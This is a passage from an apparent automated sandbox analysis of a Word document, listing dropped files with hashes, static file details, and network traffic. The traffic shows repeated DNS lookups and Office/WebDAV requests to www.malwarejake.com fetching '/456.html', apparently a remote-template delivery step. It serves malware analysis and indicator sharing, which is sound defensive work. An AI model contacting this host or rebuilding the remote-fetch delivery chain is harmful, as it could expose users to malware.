      SHA-512:8011B24585EC92ED0E5A6E4806D89533DE7604BFD949B663B7EEF16EA1D40D3F93BEA03F07E04EE9D10456FE8C3D87F7EB7AF06BE515A686D79EBE5CD6182DBB
      Malicious:false
      Preview:[folders]..Templates.LNK=0..qoIZSkdejM.LNK=0..[misc]..qoIZSkdejM.LNK=0..

      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\qoIZSkdejM.LNK

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 14:26:09 2022, mtime=Thu Aug 18 14:26:09 2022, atime=Thu Aug 18 14:26:20 2022, length=10469, window=hide
      Category:dropped
      Size (bytes):1019
      Entropy (8bit):4.575475970912561
      Encrypted:false
      SSDEEP:24:8nkvk/XTHEmxQoyCNeixGFgDv3qGniu7D:8kvk/XTkLoyCNjc/Gi0D
      MD5:B1265A330658214AB98AB51EEFFD590A
      SHA1:059ACAD7A250B8FDC69045F883DD97BEC5246641
      SHA-256:CD34EE17637F61F1857FC3D3B374C294CF58241C07B1DC442027FD0E1592BAE2
      SHA-512:97A96DD5E41667621B7833BACBF2ED12D2C6CF4195327A3D8861A2AB522CC762332851FF7142188328FAEB4E6BD4A996D9926C76ADF9EC51F56097054DE111B4
      Malicious:false
      Preview:L..................F.... .....[.......[..............(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT...user.8......QK.XhT.*...&=....U...............A.l.b.u.s.....z.1......UE{..Desktop.d......QK.X.UE{*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..(...UK{ .QOIZSK~1.DOC..L.......UE{.UE{*......... ...............q.o.I.Z.S.k.d.e.j.M...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\qoIZSkdejM.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.q.o.I.Z.S.k.d.e.j.M...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700..........D_....3N...W...9G..N..... .....[D_....3N...W...9G

      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

      C:\Users\user\Desktop\~$IZSkdejM.docx

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

      Static File Info

      General

      File type:Microsoft OOXML
      Entropy (8bit):7.832260939059278
      TrID:
      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
      • ZIP compressed archive (8000/1) 7.92%
      File name:qoIZSkdejM.docx
      File size:10469
      MD5:0d37337ead8492e1b2395f6cd4f724fc
      SHA1:a66ff1064025c026f2d88b87796009ba34c1bee8
      SHA256:cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
      SHA512:113711a807da1417cff28760d0050543631c969725c65b7b32da874cc07c16baa24a894c97ffc185cbdc574c62f078621216d7e970cdf7c89e553ca5f2fdbd2a
      SSDEEP:192:R8D/fgUUn+iZ7dADiIF8TBIuICjBlK2dRBeVeT6lf/XO+ra8a:R8bfgzn+iZ7dADiIF8NIFCu2dRBOm6lK
      TLSH:9322BF35DF0A2D52C00BC23B60060706E44B68F3DA6F2A4FF6901AD6CD624EC175DD5E
      File Content Preview:PK...........T...lU... .......[Content_Types].xml...N.0.E.H.C.m..e..j...%T.|.kOZ..dO_...)..J#..DJf.=w.....5..b...lP.Y.Nz...d.....e..S.x.%.Bb....p...2R.T..b..<..X....Q......8.A..1.~...r.....k.6.>B%.....}n.D0.e.Mc.*...h)..|...%...R.z.B...............&j..DD|

      File Icon

      Icon Hash:e4e6a2a2a4b4b4a4

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Aug 18, 2022 08:27:05.079196930 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.079236984 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.079355001 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.094245911 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.094278097 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.496416092 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.496752977 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.508595943 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.508629084 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.509022951 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.509111881 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.760010958 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.807367086 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.950066090 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.950203896 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.950298071 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.950345993 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.950719118 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.950742960 CEST44349178143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:05.950781107 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:05.950820923 CEST49178443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:11.777801991 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:11.777848959 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:11.777939081 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:11.781728983 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:11.781754971 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.157306910 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.157476902 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:12.168793917 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:12.168811083 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.169581890 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.193221092 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:12.235373974 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.522223949 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.522680998 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:12.522768021 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.522789001 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:12.523118973 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.523174047 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.523310900 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.034006119 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.034058094 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.034127951 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.035756111 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.035784006 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.393188000 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.393440962 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.407644987 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.407680988 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.408390999 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.435034037 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.479376078 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.738584995 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.738720894 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.738814116 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.739058971 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.739078045 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:18.835387945 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:18.835422993 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:18.835465908 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:18.835896969 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:18.835911036 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.202419043 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.202724934 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.214833975 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.214850903 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.215549946 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.217200994 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.259370089 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.556180954 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.556308031 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.556437969 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.556953907 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.556973934 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.579341888 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.579407930 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.579480886 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.579756021 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.579777002 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.953999996 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.954180956 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.967492104 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.967525005 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.967890978 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.971045017 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.011486053 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.308835030 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.308968067 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.309154987 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.309405088 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.309431076 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.380564928 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.380642891 CEST44349183143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.380734921 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.381005049 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.381026983 CEST44349183143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.740636110 CEST44349183143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.740732908 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.748636007 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.748660088 CEST44349183143.198.109.79192.168.2.22

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Aug 18, 2022 08:27:05.044718027 CEST5991553192.168.2.228.8.8.8
      Aug 18, 2022 08:27:05.067305088 CEST53599158.8.8.8192.168.2.22
      Aug 18, 2022 08:27:11.726632118 CEST5440853192.168.2.228.8.8.8
      Aug 18, 2022 08:27:11.754184961 CEST53544088.8.8.8192.168.2.22
      Aug 18, 2022 08:27:11.759929895 CEST5010853192.168.2.228.8.8.8
      Aug 18, 2022 08:27:11.776880980 CEST53501088.8.8.8192.168.2.22
      Aug 18, 2022 08:27:16.983206034 CEST5472353192.168.2.228.8.8.8
      Aug 18, 2022 08:27:17.008132935 CEST53547238.8.8.8192.168.2.22
      Aug 18, 2022 08:27:17.010565996 CEST5806253192.168.2.228.8.8.8
      Aug 18, 2022 08:27:17.033431053 CEST53580628.8.8.8192.168.2.22
      Aug 18, 2022 08:27:18.789341927 CEST5670353192.168.2.228.8.8.8
      Aug 18, 2022 08:27:18.808767080 CEST53567038.8.8.8192.168.2.22
      Aug 18, 2022 08:27:18.810611010 CEST5924153192.168.2.228.8.8.8
      Aug 18, 2022 08:27:18.829739094 CEST53592418.8.8.8192.168.2.22
      Aug 18, 2022 08:27:20.532392979 CEST5524453192.168.2.228.8.8.8
      Aug 18, 2022 08:27:20.549607992 CEST53552448.8.8.8192.168.2.22
      Aug 18, 2022 08:27:20.552045107 CEST5395853192.168.2.228.8.8.8
      Aug 18, 2022 08:27:20.575946093 CEST53539588.8.8.8192.168.2.22
      Aug 18, 2022 08:27:23.934649944 CEST5602053192.168.2.228.8.8.8
      Aug 18, 2022 08:27:23.951637030 CEST53560208.8.8.8192.168.2.22
      Aug 18, 2022 08:27:23.955573082 CEST5166353192.168.2.228.8.8.8
      Aug 18, 2022 08:27:23.980344057 CEST53516638.8.8.8192.168.2.22
      Aug 18, 2022 08:27:25.661467075 CEST5102053192.168.2.228.8.8.8
      Aug 18, 2022 08:27:25.680829048 CEST53510208.8.8.8192.168.2.22
      Aug 18, 2022 08:27:25.695321083 CEST6062253192.168.2.228.8.8.8
      Aug 18, 2022 08:27:25.719031096 CEST53606228.8.8.8192.168.2.22
      Aug 18, 2022 08:27:27.480531931 CEST5316053192.168.2.228.8.8.8
      Aug 18, 2022 08:27:27.516104937 CEST53531608.8.8.8192.168.2.22
      Aug 18, 2022 08:27:27.519289970 CEST6494853192.168.2.228.8.8.8
      Aug 18, 2022 08:27:27.538095951 CEST53649488.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Aug 18, 2022 08:27:05.044718027 CEST192.168.2.228.8.8.80x868fStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:11.726632118 CEST192.168.2.228.8.8.80xd966Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:11.759929895 CEST192.168.2.228.8.8.80x1b3eStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:16.983206034 CEST192.168.2.228.8.8.80xf2caStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:17.010565996 CEST192.168.2.228.8.8.80xdc64Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:18.789341927 CEST192.168.2.228.8.8.80x646cStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:18.810611010 CEST192.168.2.228.8.8.80x12f1Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:20.532392979 CEST192.168.2.228.8.8.80xe6e0Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:20.552045107 CEST192.168.2.228.8.8.80x6703Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:23.934649944 CEST192.168.2.228.8.8.80xc8ddStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:23.955573082 CEST192.168.2.228.8.8.80xe95bStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:25.661467075 CEST192.168.2.228.8.8.80x7820Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:25.695321083 CEST192.168.2.228.8.8.80x2c87Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:27.480531931 CEST192.168.2.228.8.8.80x4c7aStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)
      Aug 18, 2022 08:27:27.519289970 CEST192.168.2.228.8.8.80x288aStandard query (0)www.malwarejake.comA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Aug 18, 2022 08:27:05.067305088 CEST8.8.8.8192.168.2.220x868fNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:11.754184961 CEST8.8.8.8192.168.2.220xd966No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:11.776880980 CEST8.8.8.8192.168.2.220x1b3eNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:17.008132935 CEST8.8.8.8192.168.2.220xf2caNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:17.033431053 CEST8.8.8.8192.168.2.220xdc64No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:18.808767080 CEST8.8.8.8192.168.2.220x646cNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:18.829739094 CEST8.8.8.8192.168.2.220x12f1No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:20.549607992 CEST8.8.8.8192.168.2.220xe6e0No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:20.575946093 CEST8.8.8.8192.168.2.220x6703No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:23.951637030 CEST8.8.8.8192.168.2.220xc8ddNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:23.980344057 CEST8.8.8.8192.168.2.220xe95bNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:25.680829048 CEST8.8.8.8192.168.2.220x7820No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:25.719031096 CEST8.8.8.8192.168.2.220x2c87No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:27.516104937 CEST8.8.8.8192.168.2.220x4c7aNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
      Aug 18, 2022 08:27:27.538095951 CEST8.8.8.8192.168.2.220x288aNo error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • www.malwarejake.com

      HTTPS Proxied Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249178143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:05 UTC0OUTOPTIONS / HTTP/1.1
      User-Agent: Microsoft Office Protocol Discovery
      Host: www.malwarejake.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-08-18 06:27:05 UTC0INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:05 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 0
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249179143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:12 UTC0OUTHEAD /456.html HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft Office Existence Discovery
      Host: www.malwarejake.com
      2022-08-18 06:27:12 UTC0INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:12 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
      ETag: "1b90-5e045198f8aaa"
      Accept-Ranges: bytes
      Content-Length: 7056
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      10192.168.2.2249188143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:27 UTC11OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: www.malwarejake.com
      2022-08-18 06:27:28 UTC11INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 18 Aug 2022 06:27:28 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 311
      Connection: close
      Content-Type: text/html; charset=iso-8859-1
      2022-08-18 06:27:28 UTC12INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server a


      Session IDSource IPSource PortDestination IPDestination PortProcess
      11192.168.2.2249189143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:28 UTC12OUTGET /456.html HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: www.malwarejake.com
      If-Modified-Since: Tue, 31 May 2022 01:57:49 GMT
      If-None-Match: "1b90-5e045198f8aaa"
      Connection: Keep-Alive
      2022-08-18 06:27:28 UTC12INHTTP/1.1 304 Not Modified
      Date: Thu, 18 Aug 2022 06:27:28 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Connection: close
      ETag: "1b90-5e045198f8aaa"


      Session IDSource IPSource PortDestination IPDestination PortProcess
      12192.168.2.2249190143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:29 UTC13OUTHEAD /456.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: www.malwarejake.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-08-18 06:27:29 UTC13INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:29 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
      ETag: "1b90-5e045198f8aaa"
      Accept-Ranges: bytes
      Content-Length: 7056
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      13192.168.2.2249191143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:30 UTC13OUTHEAD /456.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: www.malwarejake.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-08-18 06:27:30 UTC13INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:30 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
      ETag: "1b90-5e045198f8aaa"
      Accept-Ranges: bytes
      Content-Length: 7056
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.2249180143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:17 UTC0OUTOPTIONS / HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
      translate: f
      Host: www.malwarejake.com
      2022-08-18 06:27:17 UTC0INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:17 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 0
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      3192.168.2.2249181143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
